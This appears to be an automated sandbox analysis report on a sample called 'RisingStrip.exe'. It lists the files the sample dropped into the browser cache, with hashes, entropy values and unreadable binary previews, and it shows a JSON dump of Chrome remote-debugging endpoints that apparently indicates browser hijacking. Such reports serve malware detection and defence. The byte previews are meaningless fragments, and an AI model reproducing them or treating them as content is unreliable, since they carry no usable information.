Preview:	...........g.T_...(.7...E\Z..q.O{.3^.. ....i.}..$.&.....U...?.E....+~^m.....N..g.]3J.=..~d]..a>.W..V..e..Q........_......X.b3.[....{....B..hR...-.....c`.".\B.x..\+.j.!...`K.........k0U.$v..<.t.TNU..A.#+.p..i.....2..%:...\|.[.Gv._vE....g.S.......N.B%S(.V......)\..!b6..Ji..z=..8?.f4..N)\...r.J.%.....f...QU......H.(...8........x%.ZY.<8...C.H........[...u.}..y...6...C....8?5....q.IN...r<.B.u..g....o..v..<.HG..C...$Q$W...S.m...rg./..........\.2....X.gi].".o..z.E.[@...-T.k.....:..M......8...y....@.p..S.V..,.4..-P5...3RZ..g...v@HO).....B..xX..K...(I.Q..<..........O...e6t.\|n.}M.K...B....17.-...l....x._...CO..o...f....[.........Q....l.......a...h.t......9E.............Z2r..+.....>......>.4...i...I.p...[:%...I..@.;%..[..%2..>vi..V.l.....z.$......."..h....uh.-..t... I.1..<..:)K......v..S..q..s1vj......+.xcs)MY..........prK,...8..:...K.....#:W.L.V..y...R....f.Z...KP_..{$L8....h.i.V/.;uk..OY....a0..n....P..C..K...Iy.{...".>X;.6.\:....j.Z......b.ol

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Advances

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	110592
Entropy (8bit):	6.626668929789856
Encrypted:	false
SSDEEP:	3072:xEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBE:xEo3tb2j6AUkB0CThp6vmVnm
MD5:	6904F7337AA9AD6C48CFC5C471E3C20C
SHA1:	0F9E39E08DC4AA0A44F09EC09002627DB26949D9
SHA-256:	CB6613A10EB47E895DE742D89B2B024DD0803F86E05FF474361FD5F774BCC38C
SHA-512:	90907088D4B9AF908D2256EC349CCB54359F94FC608A1EA91ECD8898AE1A734A66C44EAB378B31EFA2FEC1D8A83118F96791A00DE0160E4D29A4263B15876628
Malicious:	false
Preview:	J.V..........u..O...@.._^[]...U..V.u..N..Q.........A.................F..H..F.........H................U...F.Rht.J..H..F..@.P......x2.F..H... Pj.Q...RH.M..F....P.u...Q.R..E.P...Q.3........^]...U..E..@.....t.j.j..p...X.I.3.]...U..E..@.....t.j.j..p...X.I.]...U...u..u..u..u...P.I.]...U...u..M..u..I..k...]...U...u..M..u..I..B...]...U...u..M..u..I..;...]...U..V.u.W.}...t...V.P....G..H...t...Q.P..G._.p.3.^]...U.....}..t..E.P.E..p...4.I.3.....U..V.u..F...t..p...8.I..F..p.V.u..p..u...L.I...@..^]...U..QS..VW.K$.\...K4.z\...KD.r\....3.h..I..`T.f.H .K$.]"......L..K4......h..I.....N...F..F.3..^..FX.F..F..("..h..I..KD..".._..^[....Q.;.~....A..A..Q.;.~..Q..A..U...$SVWjc.5X#M.....(.I.P3.Wh.....vT..H.I...$.I.9~(v..v$.vT..9~H.= .I.v.h.....vT...vDP..~8.v.h.....vT...v4P....F .=..I.f..t.j.Ph....h.....vT..~..~.j..v.h....h.....vT..E.P.vT....I..M.."....M.U.E.+.M.M.+.E......U..M.9F.t..N..M.9F.t..F..E..>.~....E..~..~..F..E..F(...I.W.E..4...Y.M.;.u)..t..F$+.E....8...f;.uL.E......u.3...t..v$

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Am

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	128000
Entropy (8bit):	6.460657752714055
Encrypted:	false
SSDEEP:	3072:JpIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTt:KphfhnvO5bLezWWt/Dd314V14ZgP0C
MD5:	CD644469961FAF5E8BC1DFBA94275CDC
SHA1:	821A405044AE939E971A250E3B60096EC67428FC
SHA-256:	413B085D3D1AA5F3FDF6ECF8CAAAD59F59E0C88005A4AE4E111BCBCB5BCA450D
SHA-512:	B9C3B3650CA6D3B8DDC2CFA07402AF9A08E602A6EC03A1344F65408F7945D809E5676223E7337C39300CA003D32E3E270AF69B615FA4932C398A3B326D96A6BA
Malicious:	false
Preview:	.YP.L$$.E1...t$.j)...u).t$(.D$.Vj.j.P.D$4.t$$.@....0.t$,..T.I..!.D$(Pj.j..D$ .D$(PV.t$,..T.I..t$...t^.F.........=...vh=...vE=.+..t#=.+..uS...H..\|9...D9.t..@8.@......Q...H..\|9...D9.t..@83.B.P..6...H..\|9...D9.t..@8.@..........H..\|9...D9.t..@8.@......\|9...D9.t..@8.@.....v.......3.B.S...u......3.t$...X.I.....I..D$$.(.u.j.P......D$.P.G.......L$(.O..._^3.[..]...U...$S.].V.M...W.6...3.3.F...s..]..M..C....r..C..H.......E..C..u....r..K..I.....;.~..C..H......E..{..r#.K..I.....P..H.I...t..C..H.........4.I..E..C.......K....}.I.....K..E..I..{....K....u.I..k...+..E.V.....Y.M..p..E.P.E.P.u..u.......t:.}...u.V.u.Wu..............u....]../....E..F.....W.......Y_^3.[....U....SV.u.W.M..~..r#.F..H......P..H.I...t..F..H.........4.I...F.......N....I.......E.SP.E........:....}..u.j...d.I.VWP.E...@.I..u.........u....F..........................j.....`.I._^3.[....U...PSV.u.W...}.F.........N..E..I.......N..E..I.......N..E..E..I......~...E.E.r#.N..I......P..H.I...t..F..H.........4.I...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Applying

Download File

Process:	C:\Users\user\Desktop\RisingStrip.exe
File Type:	data
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	7.997472311514646
Encrypted:	true
SSDEEP:	1536:ySYepom8l/AaZrAcH6dhKm4rBhR12uqP1BXi3Zu4HCK7Cqpgi6DXmO4:yLe+ZrNHW672R1BXi5HZuqONXmO4
MD5:	145AA3078DDCB6A602001F666C67988C
SHA1:	F730CBE228B91EA8D8A50984096B154018C3D3E8
SHA-256:	D1E66A0A46199943F51A073F258B3C0D75AC771B1C0F12E26BB78D5E1355C3DD
SHA-512:	7087E1EC04E7374F1156B729B31A3B533FC5910C8577AEE0A1B89E3FFE5F643F1715E174301B274F602C487DB86F1C09870CD00FBD15D8B8B31E717992DA503C
Malicious:	false
Preview:	.\..W...z>[4wZ....xq..{8.$j..H.._...<.lZ.....4Uj...i..t(Yfw.....n-40.NM.C..V...B.....p.2N.u..."+...`.n...tO.W...z^...;..w6Z.,.X...V..[.o.S(....f....<.M.g.>...j....S\|p#...D....[..tU....mjJ....5..3..P...T..../N'90I~..sr.h.Se..Q.......u..?'....[......Ml.3..`...(...F...7..+..d.<......2n..u.VQ...0.-..\..B/....k"S.2..?..._...1..........]C.U.w.......`.6...;'.~m..&pB.v4..2..^.4..\q..,..b.J..x1..~..X......kN.t.n .....K=.3..>/...i.1.".....#..<a.2sn.r.<...t]..u..].n2 ..A.IP.v..s..X..087F...c...;.s.ir.v"t..q.^../..e...x.l:".7....c.wR.Bs<..a...m ....v...r..>....#YL..uE.....(..Y.O.>...n........i...^Y!9A......hNH97H0[.3.3&Y-O.l.Q.%v...{.$.^B...9s.%....j....W......c.v...OF+.!J........P..w.yn...h....E.@......8 .'Pd.F.6..#.d.]N........~.<D...S...{.>Z...r.E<..rp....o.b..-..u..\|...H}1..O...-J.sZ...v.\|aVf=..qP.a.(v....JD.L..Tu:.3u.Y<.mQ.j.....R....X.\|/";..)..E....X.t.e...R$...'.?/...O6.1).)..V_x...L...Ja.)....Z..]..;.....z.;.....;.(6...&i.~....V..... .yE_]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Belongs

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	6.125806089663843
Encrypted:	false
SSDEEP:	1536:8R8anHsWccd0vtmgMbFuz08QuklMBNIimu6:w8QLeAg0Fuz08XvBNbK
MD5:	416DD26520F29F383415628F15885CAC
SHA1:	1A53099D7AFC8A5EDF28285E71CE924CCA2A99B0
SHA-256:	40ACC8CA05EEDE65B90F66A3FF4E3A8CBC43AA699A99ED591EB7EA5B47E65D6D
SHA-512:	41B016A7F5AB323AEB0C75F62D776D1652D5CCE9EEBD7BF835519ADD688EF4AF0A73331D80EFEEAF0F6FAE431E5C40F8645F7A3091178502C9B42DDFE85B2FE0
Malicious:	false
Preview:	.e.-.f.i.b.e.r.s.-.l.1.-.1.-.1...a.p.i.-.m.s.-.w.i.n.-.c.o.r.e.-.s.y.n.c.h.-.l.1.-.2.-.0.....k.e.r.n.e.l.3.2.....a.p.i.-.m.s.-...e.x.t.-.m.s.-...........FlsAlloc............FlsFree.........FlsGetValue.........FlsSetValue.........InitializeCriticalSectionEx..EL...B...B.bad exception.....J...J...J...J...J...J...J...J...J...J...J.$.J.,.J.8.J.D.J.N.J.P.J.X.J.`.J.d.J.h.J.l.J.p.J.t.J.x.J.\|.J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J.$.J.0.J.H.J.T.J.h.J...J...J...J...J...J.,.J.H.J.l.J...J...J...J...J...J...J...J. .J.(.J.4.J.D.J.`.J...J...J...J...J.$.J.@.J.d.J...J...J...J...J...J.N.J. .J.4.J.P.J.d.J...J.__based(....__cdecl.__pascal....__stdcall...__thiscall..__fastcall..__vectorcall....__clrcall...__eabi..__swift_1...__swift_2...__ptr64.__restrict..__unaligned.restrict(... new.... delete.=...>>..<<..!...==..!=..[]..operator....->.....++..--..-...+...&...->./...%...<...<=..>...>=..,...()..~...^...\|..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Bound

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	15213
Entropy (8bit):	7.416142083985245
Encrypted:	false
SSDEEP:	384:1O/ChZrzmZGhLdXVaeCVrVEVFJ8ZcGwGBk7/UMQ3rw:1O/ChgZ45VatJVEV3GPkjF
MD5:	C8107433238258DD5F5A1CD5260D117C
SHA1:	C9F98E7BADDEA514C7906CD4CE19E41A5FFD9066
SHA-256:	858E9B693F7B359ED1520225132F4DCA8A8EB684A7667674E8B01C0573378A5A
SHA-512:	33DCD58400CB6CA06A5C3DEE7B0350ADACBD660A1C6747D65C39359ED05AECEAA9A04CD1DD455164BABFFC4C4948C941725DC7B78BB59F42E0DE87D8FFB3F021
Malicious:	false
Preview:	..0~1.2.2.2.2.4.5.5.5.6.6.7.7.7.7.7.8%8`8.8.8.8.8.8.9"909>9T9b9~9.9.9.9.:.:2:O:^:.:.:-;I;.;.;.;E<h<q<.<.='=e=.=.=.=.=d>.>.>,?I?X?^?.?.?.?.@......Y0.0.0.1z1.1.1.222>2.2.2.2.3.3.3.3.3.3.4.4F4.4.4.4.5.5J5e5.5.5.6.6.7&7_7l7.7.7.7.7.7.8{8.8.8.8.809C9.9.9.9.:r:.:.:.:.:.:.;.;.;2;>;.;.;.;E<f<o<.<.<.=.=.=.=.=O>.>.?.?J?g?w?.?.?...P......v0.0#1\1o1.1.1.1.1.1.2#2M2.2.2>3.3.3.3.3.4B4.4.4.575.5.546.6"7G7N7i7.7.7.7.7t8.8.8E9p9.9.9.9@:l:.:.:.:4;.;.;&<]<q<.<.<.<!=C=.=.=.=.>">H>N>.>.>.>.?.?.?.?.?.?.?.?.`.......0j0.0.0.1\1.1.1.1>2g2.2.2.3b3.3.3.3.3.3.3.3.3.4.4.4.4.4.4.4.4l4y4.4.4N5^5.5.5.6.6$6C6g6.6.6.727P7V7r7.7.7.78;8H8Q8}8.8.8.8.8.8.9.9-9H9Y9.9.9.9.9.94:L:p:v:.:.:.:.:.:.;.;.;6<_<.<.<.<.=O=.=.=.=.>.>_>.>.>.>.?w?.p......00L0.0.0.171C1.1.1 2a2.2.373=3]3m3.3.3.3.4B4.4.4_5u5.5.5.5.5m6.6.6.6.6.7:7H7.7.8%88/8=8n8.8.8.8.8.8.8.9.979P9W9a9.9.9.9 :(:K:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.;U;i;.;.;.;.;.;.;.;.<.<.<.<7<G<j<.<.<.<.=.=D=g=r=.=.=.=.=.=.=.=.=.>.>;>a>w>.>.>.>.>.>.?.?f?.?.?.?.?.?.?.?......X....0.0!0J

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Certificates

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	6.411918032410714
Encrypted:	false
SSDEEP:	3072:5g5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05m8:q5vPeDkjGgQaE/loUDtf0D
MD5:	569ECA29C0FA0925877C9267F757A729
SHA1:	C3D004B4096A26580C85310CE7DA829FBB850B6A
SHA-256:	D7E8A9C79CC85AB6388B3345B87647DA20E5E0E07C7AE11B9FE058B9D0AB5A2C
SHA-512:	89CE46F4C42743FF4D90E7B35BAEABDB6A34FF7E9DF790C11E86356F364FDCD92F4595297F33C7D96FFE4DC8CE44D502568797F153BBBD237B37AF6A057681CD
Malicious:	false
Preview:	VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.\|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....\|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Er

Download File

Process:	C:\Users\user\Desktop\RisingStrip.exe
File Type:	data
Category:	dropped
Size (bytes):	55296
Entropy (8bit):	7.99643846182079
Encrypted:	true
SSDEEP:	1536:QPSTNVSbP3ipbtLG0lFS4ZhigPYGMqUtomxO+Pl4fSc:/iL3KJLr+TGMqK3xbG
MD5:	611D83ED2EBC3F773E88C5CB67FDDC9E
SHA1:	1E7D3F330866CD42834DDF9F0491634E78433940
SHA-256:	EFDA3BE75FBD8D2113E3BEACBFB235B2043C1FA01010FD1430FB2A1D492153A3
SHA-512:	C0C5A37EA4C15875FEF39E5382BC208CFF28F785A04D07A20D1AEB0556EB58514B8DA668387AB2F7C733717C55392C990A5331B4D28660515325786E3C1D8AE5
Malicious:	false
Preview:	!=...=a..M...1.v..LJ.@..3.9..3I}1D.A.N.E.A..6..[.F.f..m..#........_Td.t9\|4.g..-....7...6D.T.[./....."C+B..R...<.I...(.R\|E)......_..o7.d..n..A...\|....'.....w.)..........tL....].=.>..P..t....c.Z-..L.g.Vs.kw[r..X.K....2...A\Q%.:V)~}..5e...+.h..8x....e..'.%D..L.T....-\.....2.,z..omz.a1.k...z...>.)...V.p..d~..O.?.K.p._Z;.}uq...`.\|.P"WT./l+..w.....m.D_p.....&...>z.P..Z.l..g)......`......<..0....)n5.,.?4U....3..>z..7..X.....X.\f..1..{X..y..Dk..s."....O.M.]+..$U.1.\|.T....:..k..1+.j..fy...Zw..N...o..U%=Q....(.j.(/..u.Pk.>......M.{.6..Bs.F..........(^..%..-Nt.s-.~..).E..M}.g.W.....`.C...-.).>....Fd...G3...s&.o..T...<.w..G.8A.+".TC4......E.<.<{..)V.l.....\B<w...\|...].gRf..p.C..H.L.i.Q.E..b....N.:4U9v..FC.....z.....W.6._h...UL.I^<.Y....q.Gvd.s..O....i..N...8......B..ia]_.m.W...ofz....K.QP..O....\...8.g"...V[......?.~s....j....f..#{....2xU#.$-..A.......,.]..B..4.qb.n.....&.`.+8.....S'z.=..D.!...#B.TM4.'.}..j`}..p.^...)..#Ky.+..2....%&h.~..W...D.[

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Generated

Download File

Process:	C:\Users\user\Desktop\RisingStrip.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	7.997321922822756
Encrypted:	true
SSDEEP:	1536:yEKDIji5ms1FsGsgBIHUuKl+RrOXAduDjGWrZjV5IrkcVMI1Xevhgsu:yEKDIjimGsUTuaX+OxskcVMIhevWsu
MD5:	8B5192934AC59A034DE5B078DC5562F2
SHA1:	AD620E1F42EE54FB9F1D7A9A55063EF6A6D8D747
SHA-256:	45EFF3C7E7A38059B585A41C35F722B6D7A69B8FFC480538184F83AB2056F917
SHA-512:	38417F85B58E79A6C347B21F1FF6A96F1BF4EA55649AAC0DD17D5B358FA7D717C3735A31B9B7733DF9041BAA8F1019BB1069E788779C2B5D12DDA14384218B18
Malicious:	false
Preview:	...........g.T_...(.7...E\Z..q.O{.3^.. ....i.}..$.&.....U...?.E....+~^m.....N..g.]3J.=..~d]..a>.W..V..e..Q........_......X.b3.[....{....B..hR...-.....c`.".\B.x..\+.j.!...`K.........k0U.$v..<.t.TNU..A.#+.p..i.....2..%:...\|.[.Gv._vE....g.S.......N.B%S(.V......)\..!b6..Ji..z=..8?.f4..N)\...r.J.%.....f...QU......H.(...8........x%.ZY.<8...C.H........[...u.}..y...6...C....8?5....q.IN...r<.B.u..g....o..v..<.HG..C...$Q$W...S.m...rg./..........\.2....X.gi].".o..z.E.[@...-T.k.....:..M......8...y....@.p..S.V..,.4..-P5...3RZ..g...v@HO).....B..xX..K...(I.Q..<..........O...e6t.\|n.}M.K...B....17.-...l....x._...CO..o...f....[.........Q....l.......a...h.t......9E.............Z2r..+.....>......>.4...i...I.p...[:%...I..@.;%..[..%2..>vi..V.l.....z.$......."..h....uh.-..t... I.1..<..:)K......v..S..q..s1vj......+.xcs)MY..........prK,...8..:...K.....#:W.L.V..y...R....f.Z...KP_..{$L8....h.i.V/.;uk..OY....a0..n....P..C..K...Iy.{...".>X;.6.\:....j.Z......b.ol

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Housing

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	123904
Entropy (8bit):	4.96348533454975
Encrypted:	false
SSDEEP:	768:WaAwuXc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:WaAwusPdKaj6iTcPAsAhxjgarB
MD5:	3171829243167C27ACFD8CEDF5D49A65
SHA1:	48E13F73779D87EC6B88402BD24E1C7AD09E9127
SHA-256:	3597C452224707D9298B488A4FF8E01765782F8E4FEF2074A1A5A8876000E00F
SHA-512:	0D587E719B0F22C2A8B401249EBC56A2108C60B7101618A5B873B8ED8136A0B396A43D3D746CF35BA7047F9809EBA5F3F6B923209821868FDF76BDDB7270EA80
Malicious:	false
Preview:	.....<.......<.......U.......U.......U.......L.......L.......L.......L.......................N.......N.......N.......N.......!....u..!....Z..!....Z..!....Z..!....Z..!....Z..!....Z..!....Z..0.......0.......0.......0.......@.......@.......J.......J.......J.......J.......J.......D.......D.......D.......D.......I.......I.......I.......I.......S.......S.......S.......S.......S.......&.......C.......C.......C.......C.......C.......[.......[.......[.......[.......V.......V.......V.......V.......V.......V...............................................................#...............................F.......B.......).......).......................u.......u.......;.......;.....................*...........(...................,.......,.......i.......g.......g.......m...............P.......P.......P.......w.......w.......w.......s.......s.......A.......A.......A.......G.......G.......a.......`.......................................W.......W.......W.......t.......t.......o.......o.......o.......o..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Hydraulic

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	152576
Entropy (8bit):	6.669705787766742
Encrypted:	false
SSDEEP:	3072:/mbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0d:ubfSCOMVIPPL/sZ7HS3zcNPj0d
MD5:	455D525ACA84ECFD7E5D0D9B3A4481C5
SHA1:	723536C7025297DBC07EB31431D42A94F02566B3
SHA-256:	925115D277D0AE2B81220C91F3E2094EDBECD871DB4D86E3824D9ECE9125FF65
SHA-512:	1606ACE46384FF2BC545F5286FE55661353AC4E99ED5E052F2F392AFF58757CEBA6E3751FA2F098241A7CDF26984F815DDD1661072CCB978FC1FA1B2A32F8918
Malicious:	false
Preview:	.?k.0.....M..T..3._^[..]..U..j..u..u..u..u..u.........]..U..QVW.=.......tN.}..tH.u..N...F..u.+..2....A..E...A..u.+M.;.v..<2=u.V.u.R..........t.....?.u.3._^..]..@....j.hH.L.......e..j..&%..Y.e...u..u..u..u..(.........u..E..................u.j..2%..Y..U..QS.].V..u..L...j.^.0.U......I.#..u.W.}...tA..tA..t.....u........Y..tM..A..E...A..u.+M.A....t4;.v!j"X_^[..]..t......j.^.0.........RVW..........u.3...3.PPPPP.......U..]..........U..Q...L.3.E..M.S.].;.vl.E.VW......;.w(...I..M.WV....I..U......~....E...;.v..M.....;.t!..t.+....R..L...D...J....u.E..M.+...;.w._^.M.3.[.......]............U..E.W.}.;.t&V.u...t.+..........@..T...L...P....u.^_].........U..........L.3.E..M..U.......V.u.......W.}.........u$..t .............._^.M.3..#.....]..t..t...................J...S.........3.+....X....w.VW......Q.}.................SQ...........I.......~.WS................................I.......~.W...........................S....I.......~.W......S..................................;.v

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.382036524295835
Encrypted:	false
SSDEEP:	48:SfNaoCIiPTECqfNaoCkCTfNaoCaCxCaffNaoCwdd0UrU0U8CI:6NnC1TECyNnCkCLNnCZCYNnCC0UrU0U2
MD5:	164FE4FEBFC0D21F200091186F919612
SHA1:	AEBCB15A0B8BEEA2589D41357DF562C0AF17A6BD
SHA-256:	75623401996FC1B05105D625E4EABA4B832B111A65BDDA13ECA5076AC5FB3056
SHA-512:	EA82119B3851C11A31555AFE217B3F60791857255EB02FDBFB82788CF99C526BB6567B8EC462F69D3D37A83C12F06DFB1589329F6150F13E707621B1DC54A4C6
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/39D0FB60E8E3B615CA2A2C719B8EE8F5",.. "id": "39D0FB60E8E3B615CA2A2C719B8EE8F5",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/39D0FB60E8E3B615CA2A2C719B8EE8F5"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/9E7231F45BE32D66FF3C11034AAB0D58",.. "id": "9E7231F45BE32D66FF3C11034AAB0D58",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/9E7231F45BE32D66FF3C11034AAB0D58"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Identifies

Download File

Process:	C:\Users\user\Desktop\RisingStrip.exe
File Type:	data
Category:	dropped
Size (bytes):	58368
Entropy (8bit):	7.997051792102876
Encrypted:	true
SSDEEP:	1536:Kx/8PHfnq4aVUKh8lbU9lbhy3bL+I8JVzC:Kmvfta4UXbhlVW
MD5:	ACC4AD52515A1B052E0C1F8EEC5D96BC
SHA1:	8E4D82FAE3F64F4AF5EDC1B7CF32B33729A1BF93
SHA-256:	A6803B14D546D5EA2D622931476AF2C24620ECAB06E02896409CF37A4093BC73
SHA-512:	50F289A9CE33EADFCB6AA9E110D6F0D507B8E627F3DFE4503EE82AE49CE0764D1DC18C084023CD4AFAC229F412241499FB592FE11F8AB34FB2033FC5325F7B9D
Malicious:	false
Preview:	./.h.....Q..V`....M..]Z.z.=(.\'./.6.....%.....{....y.............1".....P...C,.G@^...D..R.t.GK%RkS@.....`.:..3=u..u.D1H....D...@...2d{A..B.G.a...j...%j.<..{.....d[a.@..o."..X.,._...G..........%........Xd....7......%YU$&......^.E..F.Z\I.o.<..........&.O(fC...fg...Y.....>..P"...OV9\&p..'.o.Q...;Z=..Z.)..x.O\..d.$.z.....[...<.]...z..."...7A7......-?wD.>(4=I.C...K~.Hp..h..Me1.cu....\|..d.{.o(.[Fu........YS.."$Sv~A...@...Fly....M..f$wbB.xB..4....u?]a.]...KL.....P.E..<XE.U.n..F4NiK.)....yVK....C...Y.9..\....X...>....lH..W.A)wJn......v..w9.A.k..[wX...].R........t.D..%..6....irk0.oG....S...]......\|B.V..!..C..<..\3/8....P..By.\|H...^..U.l..eHX..........=.k..B.....}..........e.._0....2....)...5c...%...$...A0.R.....ET.6..R8.......Zf9..U.w,.mO./..s....G%..U......o..?#.:..h.q.}s.....&0\:Z.29K...\|.....j.X..s.....6.....M..K....]e...I .C.@!...G....a.`.f.,...Uh...AV...."J.a..TR_&.Y.\M..N.ic.....-.V.\\..j..D].t..&".4`..$.H.;...K.pPZ.......yj\....P...A0s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Mountain

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	120832
Entropy (8bit):	6.677521048151038
Encrypted:	false
SSDEEP:	3072:eccBiqXvpgF4qv+32eOyKODOSpQSAU4CE0A:eccB3gBmmLsiS+SAhC0
MD5:	C794301B564965F12F13D1CD40A5FEFD
SHA1:	7BE3E690C0B6450F34F976F3332F1A781D823954
SHA-256:	21F222C907B9D5FA415E6F2FCEDDFF8C3BEA918BD77833E6D54F502C061B71C4
SHA-512:	2D938B240BEF701C432E0B7A662BB723974C6065C2C4389DEF2366693A7E35A5ABC2B31E86CF6DC1732530F4EECAADC7B0FEE37EA6A7DBCA4CCD0C9CB7AF9A8C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	.l.jj..E..p..E..p..E..p.j..u..E..p..u..C..... .E..x$.u..u..u.....j.j.j.j.j..E.Ph#...........E..]..c..k ..3.@[..U....SVW..E.3.PPP.u..u..u..u..u........ .E._^[.E...].U..W.}.....tH....tB.Q...A..u.+.SV.Y.S.......Y..t..7SV.....E.....3....@..V.....Y^[...M......A.._].U..V.u..~..t..6.....Y.&..F..^].U... S.].VWj.Y...J..}..}...t....t......Q...p ..x.....I...]..}...t....t..E..@...E.P.u..u..u...4.I._^[....U..E..M.;.u.3.]........:.u...t.P.:Q.u.........u........]...L....M..U..E...t.=..M.t.P.....Y]............&....= .L..u.3..SW..0.I..5 .L..........Y...t...uYj..5 .L......YY..u.3..BVj(j..t.....YY..t.V.5 .L......YY..u.3.S.5 .L.....YY....3.V.x...Y^W..\|.I._..[.h.6B....... .L.Y...u.2..h..M.P.z...YY..u.......... .L....t.P....... .L..Y...VW...M.3.j.h....W.w........t.....M..........r.........2._^.V.5..M...t k..W....M.W..<.I.....M.......u._..^.U..QSVW.}............M..0.E...t...........}.....J.h....j.S..p.I.....uP..0.I...Wu5j.h\.J.S..........t!j.hl.J.S.........t.VVS..p.I.....3...u..M.......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\October

Download File

Process:	C:\Users\user\Desktop\RisingStrip.exe
File Type:	DOS executable (COM, 0x8C-variant)
Category:	dropped
Size (bytes):	46484
Entropy (8bit):	7.995736730766789
Encrypted:	true
SSDEEP:	768:hHBvpNe2OxlMHL7c10wbANuU5IvlsFTdOA6OXxWiZpanaY3R6L3C5QQF:e2OxlMrI0QANb5INchgOXxnpanaYACaw
MD5:	AEE11AEA2381C12EC9F1961D1A013538
SHA1:	D317838C84BE67D8BCBE58BE65F03B2BDCE5804C
SHA-256:	5DD6658E50537C79AFFF3573B536AF2BC8039C5C883D558CAB138A473ECD0EEC
SHA-512:	714827C27FA3B24684673B3805DE4A569D951C01E3B465FE1979C62F97C4DD7985EBDEFFAF6AC8D6D3DF0DB2DE37D124D8AA2810194C5AB16C7C0C73940F763E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	...8<..HA]$Jx.e..A..?.@G'.........e...q.0F...&Y.uou\|..-=.L.MP..iZ.M...5...._.=....p..r..A...........U.`.+.C/.N...D\|.E..T.!..A8.....y.......t...j./.+.....t?;.jz...WG...6Y....d...>:.....r.\|\..YqC.0E(..J.`..-.\|..+.> Y\|'O...2kF].H_<.........`7=m.K>G.0$N.....-..U.u.P.D^.\|./o..o[4.s3-....7[.B..>.".n.o..\.)..+......vt...}...?..j.%..ca.W..x......`C..{.=!i.g....X9.....x.....m.....`.M....h..3.o`5.X.........c.J..A4P(.&.4U..6.'...Q.q..._7..J...#....1...i.../N>...E.....\|...p%.......A^..........R$a.B.....'.P...\.z.2..h..6.Y.8...)....{.@....9..]Bl.J.]-$.j:....AW>.8..{..[......l./.-......:..@......#K.&..B.&..v$.Y..fcu....(:.\vtL.~............v...T..Y#.. 